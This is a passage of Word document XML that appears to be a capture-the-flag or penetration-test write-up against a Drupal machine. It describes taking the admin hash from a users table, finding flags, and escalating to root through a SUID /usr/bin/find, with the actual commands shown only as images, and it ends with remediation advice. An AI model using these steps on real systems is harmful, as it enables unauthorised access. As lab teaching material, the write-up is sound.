    <w:p w14:paraId="32B0CF41" w14:textId="77777777" w:rsidR="009467DE" w:rsidRDefault="009467DE" w:rsidP="005705DF"/>
    <w:p w14:paraId="609DBD63" w14:textId="77777777" w:rsidR="005705DF" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="1E775BF4" w14:textId="77777777" w:rsidR="005705DF" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="640F6313" w14:textId="77777777" w:rsidR="005705DF" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="3D58BC06" w14:textId="77777777" w:rsidR="005705DF" w:rsidRDefault="005705DF" w:rsidP="005705DF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="001710A9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251722752" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1644EB38" wp14:editId="6D007C10">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>286248</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1936067" cy="3538330"/>
            <wp:effectExtent l="0" t="0" r="7620" b="5080"/>
            <wp:wrapNone/>
            <wp:docPr id="1439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546" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId72">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1936067" cy="3538330"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t>View the tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10321025" w14:textId="77777777" w:rsidR="005705DF" w:rsidRDefault="005705DF" w:rsidP="005705DF">
      <w:r w:rsidRPr="00AC5466">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251724800" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="46A45EE8" wp14:editId="2AD9D61B">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>2138901</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>6543</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2344033" cy="3538331"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:wrapNone/>
            <wp:docPr id="20576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8608" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId73">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2349576" cy="3546698"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA2065F" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="001710A9" w:rsidRDefault="005705DF" w:rsidP="005705DF">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3719"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DB6DC9" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="001710A9" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="1A0F9ADA" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="001710A9" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="63B46713" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="001710A9" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="1AE3217E" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="001710A9" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="16888D3B" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="001710A9" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="0F9EDB97" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="001710A9" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="5C5AEA73" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="001710A9" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="26E11944" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="001710A9" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="2493173A" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="001710A9" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="39EED786" w14:textId="77777777" w:rsidR="005705DF" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="31C117DD" w14:textId="77777777" w:rsidR="001E2720" w:rsidRDefault="001E2720" w:rsidP="005705DF"/>
    <w:p w14:paraId="1387172E" w14:textId="77777777" w:rsidR="001E2720" w:rsidRDefault="001E2720" w:rsidP="005705DF"/>
    <w:p w14:paraId="17AB1DA0" w14:textId="77777777" w:rsidR="001E2720" w:rsidRDefault="001E2720" w:rsidP="005705DF"/>
    <w:p w14:paraId="761B4149" w14:textId="77777777" w:rsidR="001E2720" w:rsidRDefault="001E2720" w:rsidP="005705DF"/>
    <w:p w14:paraId="5A2E4055" w14:textId="77777777" w:rsidR="001E2720" w:rsidRDefault="001E2720" w:rsidP="005705DF"/>
    <w:p w14:paraId="7436B7C7" w14:textId="77777777" w:rsidR="001E2720" w:rsidRDefault="001E2720" w:rsidP="005705DF"/>
    <w:p w14:paraId="02552E07" w14:textId="77777777" w:rsidR="001E2720" w:rsidRDefault="001E2720" w:rsidP="005705DF"/>
    <w:p w14:paraId="1ACF0626" w14:textId="77777777" w:rsidR="005705DF" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="132BAAD0" w14:textId="77777777" w:rsidR="005705DF" w:rsidRDefault="005705DF" w:rsidP="005705DF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00AC5466">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251723776" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="01F78BE6" wp14:editId="10BEB1FA">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>290388</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5064981" cy="1634755"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:wrapNone/>
            <wp:docPr id="194764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49987" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId74">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5064981" cy="1634755"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t>From the users table, we can get the hash of the admin user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D449A39" w14:textId="77777777" w:rsidR="005705DF" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="1BDD3A13" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00AC5466" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="1109BBAE" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00AC5466" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="3D71AE58" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00AC5466" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="4D3A3F48" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00AC5466" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="4E9A9AC7" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00AC5466" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="1C30942B" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00AC5466" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="0EB1013A" w14:textId="77777777" w:rsidR="005705DF" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="3788CC1D" w14:textId="77777777" w:rsidR="005705DF" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="57E82922" w14:textId="77777777" w:rsidR="001E2720" w:rsidRDefault="001E2720" w:rsidP="005705DF"/>
    <w:p w14:paraId="2E94CD6C" w14:textId="77777777" w:rsidR="005705DF" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="1D9984B3" w14:textId="77777777" w:rsidR="005705DF" w:rsidRDefault="005705DF" w:rsidP="005705DF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Go to the home directory to get flag4.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2584800D" w14:textId="77777777" w:rsidR="005705DF" w:rsidRDefault="005705DF" w:rsidP="005705DF">
      <w:r w:rsidRPr="00894540">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251725824" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7EBE78DE" wp14:editId="6C2FE491">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-1270</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2124371" cy="876422"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47885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53678" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId75">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2124371" cy="876422"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="67312EF7" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00894540" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="64E39511" w14:textId="77777777" w:rsidR="005705DF" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="1F540A7B" w14:textId="77777777" w:rsidR="001E2720" w:rsidRDefault="001E2720" w:rsidP="005705DF"/>
    <w:p w14:paraId="3113BBD1" w14:textId="77777777" w:rsidR="001E2720" w:rsidRDefault="001E2720" w:rsidP="005705DF"/>
    <w:p w14:paraId="24A67F96" w14:textId="77777777" w:rsidR="001E2720" w:rsidRDefault="001E2720" w:rsidP="005705DF"/>
    <w:p w14:paraId="27F2546A" w14:textId="77777777" w:rsidR="001E2720" w:rsidRDefault="001E2720" w:rsidP="005705DF"/>
    <w:p w14:paraId="29CBA73B" w14:textId="77777777" w:rsidR="001E2720" w:rsidRPr="00894540" w:rsidRDefault="001E2720" w:rsidP="005705DF"/>
    <w:p w14:paraId="09DA9721" w14:textId="77777777" w:rsidR="005705DF" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="21E47A52" w14:textId="77777777" w:rsidR="005705DF" w:rsidRDefault="005705DF" w:rsidP="005705DF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Next check </w:t>
      </w:r>
      <w:r w:rsidRPr="00572136">
        <w:t>for SUID binaries—executables that run with elevated privileges and are often misconfigured. These can act as hidden doors to root if exploited correctly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55357182" w14:textId="77777777" w:rsidR="005705DF" w:rsidRDefault="005705DF" w:rsidP="005705DF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E505A45" w14:textId="11D207D4" w:rsidR="005705DF" w:rsidRDefault="005705DF" w:rsidP="005705DF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00EF4ED6">
        <w:t>Among the usual system binaries, one particular candidate stood out: /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF4ED6">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF4ED6">
        <w:t xml:space="preserve">/bin/find. </w:t>
      </w:r>
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF4ED6">
        <w:t>his tool could be abused to escalate privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA4054C" w14:textId="4182FC39" w:rsidR="005705DF" w:rsidRDefault="00580BB9" w:rsidP="005705DF">
      <w:r w:rsidRPr="00126BF5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251726848" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="04607BB3" wp14:editId="09AAB823">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>83765</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3867150" cy="3124835"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="37649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99407" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId76">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3867150" cy="3124835"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6C14BF" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00126BF5" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="636498A9" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00126BF5" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="25416ADB" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00126BF5" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="59AD16C5" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00126BF5" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="604F5AC8" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00126BF5" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="5F5A94FA" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00126BF5" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="3112315C" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00126BF5" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="21FC5789" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00126BF5" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="68B6F6B0" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00126BF5" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="4E22A88F" w14:textId="77777777" w:rsidR="005705DF" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="7DFBA46B" w14:textId="77777777" w:rsidR="00324AAC" w:rsidRDefault="00324AAC" w:rsidP="005705DF"/>
    <w:p w14:paraId="53D025AE" w14:textId="77777777" w:rsidR="00324AAC" w:rsidRDefault="00324AAC" w:rsidP="005705DF"/>
    <w:p w14:paraId="576364C2" w14:textId="77777777" w:rsidR="00324AAC" w:rsidRDefault="00324AAC" w:rsidP="005705DF"/>
    <w:p w14:paraId="506C44BB" w14:textId="77777777" w:rsidR="00324AAC" w:rsidRDefault="00324AAC" w:rsidP="005705DF"/>
    <w:p w14:paraId="583EF104" w14:textId="77777777" w:rsidR="00324AAC" w:rsidRDefault="00324AAC" w:rsidP="005705DF"/>
    <w:p w14:paraId="001FBB02" w14:textId="77777777" w:rsidR="00324AAC" w:rsidRDefault="00324AAC" w:rsidP="005705DF"/>
    <w:p w14:paraId="22A961FF" w14:textId="77777777" w:rsidR="005705DF" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="57214AA1" w14:textId="77777777" w:rsidR="005705DF" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="3338D7E8" w14:textId="77777777" w:rsidR="005705DF" w:rsidRDefault="005705DF" w:rsidP="005705DF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>We finally got root access and thefinalflag.txt using the below command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BFBBD2" w14:textId="77777777" w:rsidR="005705DF" w:rsidRDefault="005705DF" w:rsidP="005705DF">
      <w:r w:rsidRPr="003B20F2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251727872" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4798D465" wp14:editId="243DF694">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>41707</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3943900" cy="1200318"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="57446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62691" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId77">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3943900" cy="1200318"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="24952748" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00310F23" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="0910AD48" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00310F23" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="5FD45881" w14:textId="77777777" w:rsidR="005705DF" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="65B04E0D" w14:textId="77777777" w:rsidR="00B0410B" w:rsidRDefault="00B0410B" w:rsidP="005705DF"/>
    <w:p w14:paraId="1E84FA42" w14:textId="77777777" w:rsidR="00B0410B" w:rsidRPr="00310F23" w:rsidRDefault="00B0410B" w:rsidP="005705DF"/>
    <w:p w14:paraId="7054334A" w14:textId="77777777" w:rsidR="005705DF" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="69408355" w14:textId="77777777" w:rsidR="005705DF" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="6AFB51FB" w14:textId="77777777" w:rsidR="005705DF" w:rsidRDefault="005705DF" w:rsidP="005705DF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E95BE7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Remediation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4684FEEC" w14:textId="77777777" w:rsidR="005705DF" w:rsidRDefault="005705DF" w:rsidP="005705DF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="001E2C25">
        <w:t>Upgrade Drupal to the latest secure version.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77347D92" w14:textId="77777777" w:rsidR="005705DF" w:rsidRDefault="005705DF" w:rsidP="005705DF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="001A2E5E">
        <w:t>Enable Drupal security modules</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C24213" w14:textId="77777777" w:rsidR="005705DF" w:rsidRDefault="005705DF" w:rsidP="005705DF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00200CDC">
        <w:t>Deploy WAF</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6DAC71" w14:textId="77777777" w:rsidR="005705DF" w:rsidRDefault="005705DF" w:rsidP="005705DF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78E7B415" w14:textId="77777777" w:rsidR="00B0410B" w:rsidRDefault="00B0410B" w:rsidP="005705DF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C61A445" w14:textId="77777777" w:rsidR="00B0410B" w:rsidRDefault="00B0410B" w:rsidP="005705DF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BC7E8FE" w14:textId="77777777" w:rsidR="00B0410B" w:rsidRDefault="00B0410B" w:rsidP="005705DF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08362379" w14:textId="77777777" w:rsidR="00B0410B" w:rsidRDefault="00B0410B" w:rsidP="005705DF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E58E63E" w14:textId="77777777" w:rsidR="00B0410B" w:rsidRDefault="00B0410B" w:rsidP="005705DF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3804CEE5" w14:textId="77777777" w:rsidR="00B0410B" w:rsidRDefault="00B0410B" w:rsidP="005705DF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="107D4737" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00F616F2" w:rsidRDefault="005705DF" w:rsidP="00F616F2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc224128488"/>
      <w:r w:rsidRPr="00F616F2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
